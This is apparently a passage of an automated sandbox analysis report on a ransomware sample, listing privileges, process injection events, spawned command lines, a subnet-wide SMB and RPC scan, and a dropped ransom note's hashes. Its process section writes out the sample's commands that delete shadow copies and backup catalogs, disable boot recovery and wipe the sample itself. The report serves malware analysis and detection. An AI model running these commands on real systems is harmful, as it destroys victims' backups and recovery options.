Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1180 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe C:\Windows\System32\cmd.exe
PID 1180 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe C:\Windows\System32\cmd.exe
PID 4952 wrote to memory of 4456 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4952 wrote to memory of 4456 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4952 wrote to memory of 4284 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4952 wrote to memory of 4284 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4952 wrote to memory of 2704 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4952 wrote to memory of 2704 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4952 wrote to memory of 4892 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4952 wrote to memory of 4892 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4952 wrote to memory of 3244 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 4952 wrote to memory of 3244 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 1180 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe C:\Windows\SysWOW64\cmd.exe
PID 1180 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe C:\Windows\SysWOW64\cmd.exe
PID 1180 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe C:\Windows\SysWOW64\cmd.exe
PID 760 wrote to memory of 5692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 760 wrote to memory of 5692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 760 wrote to memory of 5692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 760 wrote to memory of 2392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe
PID 760 wrote to memory of 2392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe
PID 760 wrote to memory of 2392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe

"C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe" & Del /f /q "C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.7 -n 3

C:\Windows\SysWOW64\fsutil.exe

fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 5.181.190.20.in-addr.arpa udp
US 8.8.8.8:53 193.78.101.95.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
N/A 10.127.0.244:445 tcp
N/A 10.127.0.231:445 tcp
N/A 10.127.0.230:445 tcp
N/A 10.127.0.205:445 tcp
N/A 10.127.0.238:445 tcp
N/A 10.127.0.212:445 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.215:445 tcp
N/A 10.127.0.121:445 tcp
N/A 10.127.0.234:445 tcp
N/A 10.127.0.219:445 tcp
N/A 10.127.0.192:445 tcp
N/A 10.127.0.221:445 tcp
N/A 10.127.0.220:445 tcp
N/A 10.127.0.227:445 tcp
N/A 10.127.0.198:445 tcp
N/A 10.127.0.232:445 tcp
N/A 10.127.0.229:445 tcp
N/A 10.127.0.195:445 tcp
N/A 10.127.0.199:445 tcp
N/A 10.127.0.208:445 tcp
N/A 10.127.0.172:445 tcp
N/A 10.127.0.196:445 tcp
N/A 10.127.0.243:445 tcp
N/A 10.127.0.91:445 tcp
N/A 10.127.0.200:445 tcp
N/A 10.127.0.92:445 tcp
N/A 10.127.0.193:445 tcp
N/A 10.127.0.189:445 tcp
N/A 10.127.0.236:445 tcp
N/A 10.127.0.249:445 tcp
N/A 10.127.0.188:445 tcp
N/A 10.127.0.211:445 tcp
N/A 10.127.0.210:445 tcp
N/A 10.127.0.245:445 tcp
N/A 10.127.0.190:445 tcp
N/A 10.127.0.223:445 tcp
N/A 10.127.0.214:445 tcp
N/A 10.127.0.161:445 tcp
N/A 10.127.0.206:445 tcp
N/A 10.127.0.185:445 tcp
N/A 10.127.0.251:445 tcp
N/A 10.127.0.216:445 tcp
N/A 10.127.0.253:445 tcp
N/A 10.127.0.167:445 tcp
N/A 10.127.0.159:445 tcp
N/A 10.127.0.228:445 tcp
N/A 10.127.0.248:445 tcp
N/A 10.127.0.246:445 tcp
N/A 10.127.0.252:445 tcp
N/A 10.127.0.239:445 tcp
N/A 10.127.0.194:445 tcp
N/A 10.127.0.183:445 tcp
N/A 10.127.0.171:445 tcp
N/A 10.127.0.240:445 tcp
N/A 10.127.0.174:445 tcp
N/A 10.127.0.235:445 tcp
N/A 10.127.0.165:445 tcp
N/A 10.127.0.247:445 tcp
N/A 10.127.0.233:445 tcp
N/A 10.127.0.180:445 tcp
N/A 10.127.0.162:445 tcp
N/A 10.127.0.157:445 tcp
N/A 10.127.0.250:445 tcp
N/A 10.127.0.209:445 tcp
N/A 10.127.0.166:445 tcp
N/A 10.127.0.164:445 tcp
N/A 10.127.0.202:445 tcp
N/A 10.127.0.187:445 tcp
N/A 10.127.0.158:445 tcp
N/A 10.127.0.186:445 tcp
N/A 10.127.0.163:445 tcp
N/A 10.127.0.175:445 tcp
N/A 10.127.0.181:445 tcp
N/A 10.127.0.177:445 tcp
N/A 10.127.0.203:445 tcp
N/A 10.127.0.160:445 tcp
N/A 10.127.0.218:445 tcp
N/A 10.127.0.201:445 tcp
N/A 10.127.0.179:445 tcp
N/A 10.127.0.169:445 tcp
N/A 10.127.0.197:445 tcp
N/A 10.127.0.241:445 tcp
N/A 10.127.0.168:445 tcp
N/A 10.127.0.226:445 tcp
N/A 10.127.0.237:445 tcp
N/A 10.127.0.191:445 tcp
N/A 10.127.0.222:445 tcp
N/A 10.127.0.225:445 tcp
N/A 10.127.0.207:445 tcp
N/A 10.127.0.170:445 tcp
N/A 10.127.0.224:445 tcp
N/A 10.127.0.176:445 tcp
N/A 10.127.0.242:445 tcp
N/A 10.127.0.217:445 tcp
N/A 10.127.0.213:445 tcp
N/A 10.127.0.204:445 tcp
N/A 10.127.0.184:445 tcp
N/A 10.127.0.182:445 tcp
N/A 10.127.0.178:445 tcp
N/A 10.127.0.173:445 tcp
N/A 10.127.0.254:445 tcp
N/A 10.127.0.155:445 tcp
N/A 10.127.0.156:445 tcp
N/A 10.127.0.154:445 tcp
N/A 10.127.0.153:445 tcp
N/A 10.127.0.152:445 tcp
N/A 10.127.0.151:445 tcp
N/A 10.127.0.150:445 tcp
N/A 10.127.0.149:445 tcp
N/A 10.127.0.148:445 tcp
N/A 10.127.0.147:445 tcp
N/A 10.127.0.146:445 tcp
N/A 10.127.0.145:445 tcp
N/A 10.127.0.144:445 tcp
N/A 10.127.0.143:445 tcp
N/A 10.127.0.142:445 tcp
N/A 10.127.0.141:445 tcp
N/A 10.127.0.140:445 tcp
N/A 10.127.0.139:445 tcp
N/A 10.127.0.138:445 tcp
N/A 10.127.0.137:445 tcp
N/A 10.127.0.136:445 tcp
N/A 10.127.0.134:445 tcp
N/A 10.127.0.135:445 tcp
N/A 10.127.0.133:445 tcp
N/A 10.127.0.132:445 tcp
N/A 10.127.0.131:445 tcp
N/A 10.127.0.129:445 tcp
N/A 10.127.0.127:445 tcp
N/A 10.127.0.128:445 tcp
N/A 10.127.0.126:445 tcp
N/A 10.127.0.125:445 tcp
N/A 10.127.0.124:445 tcp
N/A 10.127.0.123:445 tcp
N/A 10.127.0.122:445 tcp
N/A 10.127.0.120:445 tcp
N/A 10.127.0.119:445 tcp
N/A 10.127.0.118:445 tcp
N/A 10.127.0.117:445 tcp
N/A 10.127.0.116:445 tcp
N/A 10.127.0.114:445 tcp
N/A 10.127.0.112:445 tcp
N/A 10.127.0.113:445 tcp
N/A 10.127.0.111:445 tcp
N/A 10.127.0.110:445 tcp
N/A 10.127.0.109:445 tcp
N/A 10.127.0.108:445 tcp
N/A 10.127.0.107:445 tcp
N/A 10.127.0.106:445 tcp
N/A 10.127.0.105:445 tcp
N/A 10.127.0.104:445 tcp
N/A 10.127.0.103:445 tcp
N/A 10.127.0.102:445 tcp
N/A 10.127.0.101:445 tcp
N/A 10.127.0.100:445 tcp
N/A 10.127.0.99:445 tcp
N/A 10.127.0.98:445 tcp
N/A 10.127.0.97:445 tcp
N/A 10.127.0.96:445 tcp
N/A 10.127.0.95:445 tcp
N/A 10.127.0.115:445 tcp
N/A 10.127.0.94:445 tcp
N/A 10.127.0.93:445 tcp
N/A 10.127.0.90:445 tcp
N/A 10.127.0.89:445 tcp
N/A 10.127.0.88:445 tcp
N/A 10.127.0.87:445 tcp
N/A 10.127.0.86:445 tcp
N/A 10.127.0.85:445 tcp
N/A 10.127.0.84:445 tcp
N/A 10.127.0.83:445 tcp
N/A 10.127.0.82:445 tcp
N/A 10.127.0.81:445 tcp
N/A 10.127.0.80:445 tcp
N/A 10.127.0.79:445 tcp
N/A 10.127.0.78:445 tcp
N/A 10.127.0.77:445 tcp
N/A 10.127.0.76:445 tcp
N/A 10.127.0.75:445 tcp
N/A 10.127.0.74:445 tcp
N/A 10.127.0.73:445 tcp
N/A 10.127.0.72:445 tcp
N/A 10.127.0.71:445 tcp
N/A 10.127.0.70:445 tcp
N/A 10.127.0.69:445 tcp
N/A 10.127.0.68:445 tcp
N/A 10.127.0.67:445 tcp
N/A 10.127.0.66:445 tcp
N/A 10.127.0.65:445 tcp
N/A 10.127.0.64:445 tcp
N/A 10.127.0.63:445 tcp
N/A 10.127.0.62:445 tcp
N/A 10.127.0.61:445 tcp
N/A 10.127.0.60:445 tcp
N/A 10.127.0.59:445 tcp
N/A 10.127.0.58:445 tcp
N/A 10.127.0.57:445 tcp
N/A 10.127.0.56:445 tcp
N/A 10.127.0.55:445 tcp
N/A 10.127.0.54:445 tcp
N/A 10.127.0.53:445 tcp
N/A 10.127.0.52:445 tcp
N/A 10.127.0.51:445 tcp
N/A 10.127.0.50:445 tcp
N/A 10.127.0.49:445 tcp
N/A 10.127.0.48:445 tcp
N/A 10.127.0.47:445 tcp
N/A 10.127.0.46:445 tcp
N/A 10.127.0.45:445 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.0.43:445 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.0.41:445 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.0.37:445 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.0:445 tcp
N/A 10.127.0.240:135 tcp
N/A 10.127.0.238:135 tcp
N/A 10.127.0.239:135 tcp
N/A 10.127.0.241:135 tcp
N/A 10.127.0.242:135 tcp
N/A 10.127.0.243:135 tcp
N/A 10.127.0.244:135 tcp
N/A 10.127.0.245:135 tcp
N/A 10.127.0.247:135 tcp
N/A 10.127.0.246:135 tcp
N/A 10.127.0.248:135 tcp
N/A 10.127.0.250:135 tcp
N/A 10.127.0.249:135 tcp
N/A 10.127.0.252:135 tcp
N/A 10.127.0.254:135 tcp
N/A 10.127.0.253:135 tcp
N/A 10.127.0.164:135 tcp
N/A 10.127.0.165:135 tcp
N/A 10.127.0.166:135 tcp
N/A 10.127.0.173:135 tcp
N/A 10.127.0.167:135 tcp
N/A 10.127.0.168:135 tcp
N/A 10.127.0.170:135 tcp
N/A 10.127.0.169:135 tcp
N/A 10.127.0.171:135 tcp
N/A 10.127.0.172:135 tcp
N/A 10.127.0.174:135 tcp
N/A 10.127.0.177:135 tcp
N/A 10.127.0.175:135 tcp
N/A 10.127.0.176:135 tcp
N/A 10.127.0.178:135 tcp
N/A 10.127.0.179:135 tcp
N/A 10.127.0.180:135 tcp
N/A 10.127.0.181:135 tcp
N/A 10.127.0.220:135 tcp
N/A 10.127.0.194:135 tcp
N/A 10.127.0.182:135 tcp
N/A 10.127.0.232:135 tcp
N/A 10.127.0.233:135 tcp
N/A 10.127.0.218:135 tcp
N/A 10.127.0.234:135 tcp
N/A 10.127.0.235:135 tcp
N/A 10.127.0.230:135 tcp
N/A 10.127.0.231:135 tcp
N/A 10.127.0.229:135 tcp
N/A 10.127.0.228:135 tcp
N/A 10.127.0.226:135 tcp
N/A 10.127.0.227:135 tcp
N/A 10.127.0.225:135 tcp
N/A 10.127.0.224:135 tcp
N/A 10.127.0.222:135 tcp
N/A 10.127.0.223:135 tcp
N/A 10.127.0.217:135 tcp
N/A 10.127.0.221:135 tcp
N/A 10.127.0.219:135 tcp
N/A 10.127.0.213:135 tcp
N/A 10.127.0.215:135 tcp
N/A 10.127.0.214:135 tcp
N/A 10.127.0.209:135 tcp
N/A 10.127.0.212:135 tcp
N/A 10.127.0.210:135 tcp
N/A 10.127.0.211:135 tcp
N/A 10.127.0.205:135 tcp
N/A 10.127.0.207:135 tcp
N/A 10.127.0.208:135 tcp
N/A 10.127.0.206:135 tcp
N/A 10.127.0.202:135 tcp
N/A 10.127.0.204:135 tcp
N/A 10.127.0.203:135 tcp
N/A 10.127.0.201:135 tcp
N/A 10.127.0.200:135 tcp
N/A 10.127.0.199:135 tcp
N/A 10.127.0.198:135 tcp
N/A 10.127.0.196:135 tcp
N/A 10.127.0.197:135 tcp
N/A 10.127.0.195:135 tcp
N/A 10.127.0.193:135 tcp
N/A 10.127.0.191:135 tcp
N/A 10.127.0.188:135 tcp
N/A 10.127.0.192:135 tcp
N/A 10.127.0.189:135 tcp
N/A 10.127.0.185:135 tcp
N/A 10.127.0.190:135 tcp
N/A 10.127.0.187:135 tcp
N/A 10.127.0.186:135 tcp
N/A 10.127.0.184:135 tcp
N/A 10.127.0.237:135 tcp
N/A 10.127.0.183:135 tcp
N/A 10.127.0.236:135 tcp
N/A 10.127.0.216:135 tcp
N/A 10.127.0.251:135 tcp
N/A 10.127.0.163:135 tcp
N/A 10.127.0.162:135 tcp
N/A 10.127.0.161:135 tcp
N/A 10.127.0.160:135 tcp
N/A 10.127.0.159:135 tcp
N/A 10.127.0.157:135 tcp
N/A 10.127.0.158:135 tcp
N/A 10.127.0.155:135 tcp
N/A 10.127.0.156:135 tcp
N/A 10.127.0.154:135 tcp
N/A 10.127.0.153:135 tcp
N/A 10.127.0.152:135 tcp
N/A 10.127.0.151:135 tcp
N/A 10.127.0.150:135 tcp
N/A 10.127.0.149:135 tcp
N/A 10.127.0.148:135 tcp
N/A 10.127.0.147:135 tcp
N/A 10.127.0.145:135 tcp
N/A 10.127.0.146:135 tcp
N/A 10.127.0.143:135 tcp
N/A 10.127.0.144:135 tcp
N/A 10.127.0.142:135 tcp
N/A 10.127.0.141:135 tcp
N/A 10.127.0.139:135 tcp
N/A 10.127.0.140:135 tcp
N/A 10.127.0.137:135 tcp
N/A 10.127.0.138:135 tcp
N/A 10.127.0.136:135 tcp
N/A 10.127.0.134:135 tcp
N/A 10.127.0.135:135 tcp
N/A 10.127.0.109:135 tcp
N/A 10.127.0.111:135 tcp
N/A 10.127.0.110:135 tcp
N/A 10.127.0.114:135 tcp
N/A 10.127.0.113:135 tcp
N/A 10.127.0.121:135 tcp
N/A 10.127.0.112:135 tcp
N/A 10.127.0.116:135 tcp
N/A 10.127.0.117:135 tcp
N/A 10.127.0.118:135 tcp
N/A 10.127.0.119:135 tcp
N/A 10.127.0.120:135 tcp
N/A 10.127.0.125:135 tcp
N/A 10.127.0.123:135 tcp
N/A 10.127.0.124:135 tcp
N/A 10.127.0.122:135 tcp
N/A 10.127.0.128:135 tcp
N/A 10.127.0.127:135 tcp
N/A 10.127.0.126:135 tcp
N/A 10.127.0.132:135 tcp
N/A 10.127.0.131:135 tcp
N/A 10.127.0.129:135 tcp
N/A 10.127.0.133:135 tcp
N/A 10.127.0.30:135 tcp
N/A 10.127.0.108:135 tcp
N/A 10.127.0.31:135 tcp
N/A 10.127.0.105:135 tcp
N/A 10.127.0.107:135 tcp
N/A 10.127.0.106:135 tcp
N/A 10.127.0.100:135 tcp
N/A 10.127.0.104:135 tcp
N/A 10.127.0.102:135 tcp
N/A 10.127.0.103:135 tcp
N/A 10.127.0.99:135 tcp
N/A 10.127.0.101:135 tcp
N/A 10.127.0.93:135 tcp
N/A 10.127.0.98:135 tcp
N/A 10.127.0.97:135 tcp
N/A 10.127.0.96:135 tcp
N/A 10.127.0.95:135 tcp
N/A 10.127.0.94:135 tcp
N/A 10.127.0.115:135 tcp
N/A 10.127.0.92:135 tcp
N/A 10.127.0.86:135 tcp
N/A 10.127.0.91:135 tcp
N/A 10.127.0.89:135 tcp
N/A 10.127.0.90:135 tcp
N/A 10.127.0.88:135 tcp
N/A 10.127.0.84:135 tcp
N/A 10.127.0.87:135 tcp
N/A 10.127.0.79:135 tcp
N/A 10.127.0.83:135 tcp
N/A 10.127.0.85:135 tcp
N/A 10.127.0.82:135 tcp
N/A 10.127.0.81:135 tcp
N/A 10.127.0.80:135 tcp
N/A 10.127.0.78:135 tcp
N/A 10.127.0.77:135 tcp
N/A 10.127.0.70:135 tcp
N/A 10.127.0.76:135 tcp
N/A 10.127.0.75:135 tcp
N/A 10.127.0.74:135 tcp
N/A 10.127.0.72:135 tcp
N/A 10.127.0.73:135 tcp
N/A 10.127.0.64:135 tcp
N/A 10.127.0.71:135 tcp
N/A 10.127.0.69:135 tcp
N/A 10.127.0.67:135 tcp
N/A 10.127.0.68:135 tcp
N/A 10.127.0.65:135 tcp
N/A 10.127.0.57:135 tcp
N/A 10.127.0.66:135 tcp
N/A 10.127.0.62:135 tcp
N/A 10.127.0.60:135 tcp
N/A 10.127.0.63:135 tcp
N/A 10.127.0.61:135 tcp
N/A 10.127.0.59:135 tcp
N/A 10.127.0.58:135 tcp
N/A 10.127.0.50:135 tcp
N/A 10.127.0.54:135 tcp
N/A 10.127.0.55:135 tcp
N/A 10.127.0.56:135 tcp
N/A 10.127.0.53:135 tcp
N/A 10.127.0.52:135 tcp
N/A 10.127.0.48:135 tcp
N/A 10.127.0.51:135 tcp
N/A 10.127.0.49:135 tcp
N/A 10.127.0.43:135 tcp
N/A 10.127.0.47:135 tcp
N/A 10.127.0.46:135 tcp
N/A 10.127.0.42:135 tcp
N/A 10.127.0.45:135 tcp
N/A 10.127.0.44:135 tcp
N/A 10.127.0.38:135 tcp
N/A 10.127.0.40:135 tcp
N/A 10.127.0.41:135 tcp
N/A 10.127.0.39:135 tcp
N/A 10.127.0.34:135 tcp
N/A 10.127.0.36:135 tcp
N/A 10.127.0.37:135 tcp
N/A 10.127.0.35:135 tcp
N/A 10.127.0.33:135 tcp
N/A 10.127.0.32:135 tcp
N/A 10.127.0.28:135 tcp
N/A 10.127.0.27:135 tcp
N/A 10.127.0.29:135 tcp
N/A 10.127.0.26:135 tcp
N/A 10.127.0.25:135 tcp
N/A 10.127.0.24:135 tcp
N/A 10.127.0.23:135 tcp
N/A 10.127.0.22:135 tcp
N/A 10.127.0.20:135 tcp
N/A 10.127.0.21:135 tcp
N/A 10.127.0.15:135 tcp
N/A 10.127.0.16:135 tcp
N/A 10.127.0.11:135 tcp
N/A 10.127.0.12:135 tcp
N/A 10.127.0.7:135 tcp
N/A 10.127.0.8:135 tcp
N/A 10.127.0.4:135 tcp
N/A 10.127.0.3:135 tcp
N/A 10.127.0.2:135 tcp
N/A 10.127.0.1:135 tcp
N/A 10.127.0.0:135 tcp
N/A 10.127.0.14:135 tcp
N/A 10.127.0.13:135 tcp
N/A 10.127.0.5:135 tcp
N/A 10.127.0.19:135 tcp
N/A 10.127.0.18:135 tcp
N/A 10.127.0.9:135 tcp
N/A 10.127.0.10:135 tcp
N/A 10.127.0.6:135 tcp
N/A 10.127.0.17:135 tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 187.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 202.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

C:\Program Files\dotnet\Restore-My-Files.txt

MD5 3362567d63f9a8fb242c0c11689eec22
SHA1 1de67effa9309a48ad233685501e566f49e642c6
SHA256 a52d0e74559e1d8068751d2661de4b058ae097b546a49e9842a3ce74a0d9a41b
SHA512 a2f7546dc25c4cca2d434829f0ef125e06e2f44f51d001421cc46848993e35ca2fb78dbe84ef13c545773e5643403d1c600ba17a515d8f9092df1c66ff0f2794